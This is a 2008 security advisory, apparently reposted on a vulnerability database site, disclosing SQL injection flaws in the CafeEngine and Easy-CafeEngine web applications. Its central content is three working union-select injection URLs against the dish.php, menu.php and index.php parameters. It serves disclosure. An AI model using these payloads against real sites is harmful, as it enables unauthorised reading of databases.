CafeEngine Multiple Remote SQL Injection Vulnerabilities

2008-10-20 / 2008-10-21
Credit: 0xFFFFFF
Risk: High
Local: No
Remote: Yes
CWE: CWE-89

___________________________________________________________________________________________________________ | _ __ ___ ___ __________________ ___ ___ ____ ______ __ ___ _________________ _______ | | | | / / / / / //_______ _______/ / / / // || ____|| |/ // ___________// \ | | | | ^ / / / /_/ / /__/ / /___ ___ / /_/ // || | | v // /___ / O / | | | | / \ / / / _ / / / / ____/ /__// __ // /| || | | \\ ____/ / / | | | |/ \/ / / / / / / / / /_______ / / / // /_| || |___ | |\ \\ /__________ / /\ \ | | | / /\ / /__/ /__/ /__/ /__________/ /__/ /__//________||______||__| \__\\___________//____/ \___\ | | | / \/ | | | / _____________________________________________________________________________________________________| | | / / .: CafeEngine Multipe remote SQL Injection :. | | |/ /______________________________________________________________________________________________________| | v / Discoverd By: 0xFFFFFF . Main THX: ALLAH | | / Home: www.white-hacker.com . Greetz To: All Hackers & WHITE-HACKER Team | | / Mail: admin(at)white-hacker[dot]com . | |/ Country: Algeria . | v___________________________________________________________________________________________________________| | Publication info :. | |___________________________________________________________________________________________________________| | Date: 19-09-2008 . Method : [*] GET [ ] POST | | Content: Vulnerability . Register Globals : [ ] ON [*] OFF | | Type: SQL injection . Magic quotes : [*] ON [ ] OFF | | Application: Easy-Cafeengine / Cafeengine . Risk: [*] High [ ] medium [ ] Low | | Venedor site: http://cafeengine.com/ . | | Version: N/A . | | Impact: Exploring Database . | | Exploit: Available . | | Fix: N/A . | |___________________________________________________________________________________________________________| | Description :. | |___________________________________________________________________________________________________________| | Input "id" passed into dish.php,menu.php pages is not properly verified, | | a visitor can easily get sensitive information from the database by injecting SQL Querys | | ......................................................................................................... | | | | CafeEngine Exploit : | | [Site]dish.php?id=-1+union+select+version(),2,3,4,5,6,7,8,9,10 | | [Site]menu.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12 | | | | Easy-CafeEngine Exploit: | | [Site]index.php?itemid=-1+union+select+1,2,3,version(),5,6,7,8,9 | |___________________________________________________________________________________________________________| | Notice :. | |___________________________________________________________________________________________________________| | These publications are published for educational purpose thus the author will be not responsible | | for any damage. | |___________________________________________________________________________________________________________| \ © WHITE-HACKER All contents © 2008. All rights reserved. | \____________________________________________________________|

Referencje:

http://www.securityfocus.com/bid/31788
http://www.milw0rm.com/exploits/6762
http://secunia.com/advisories/32307


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top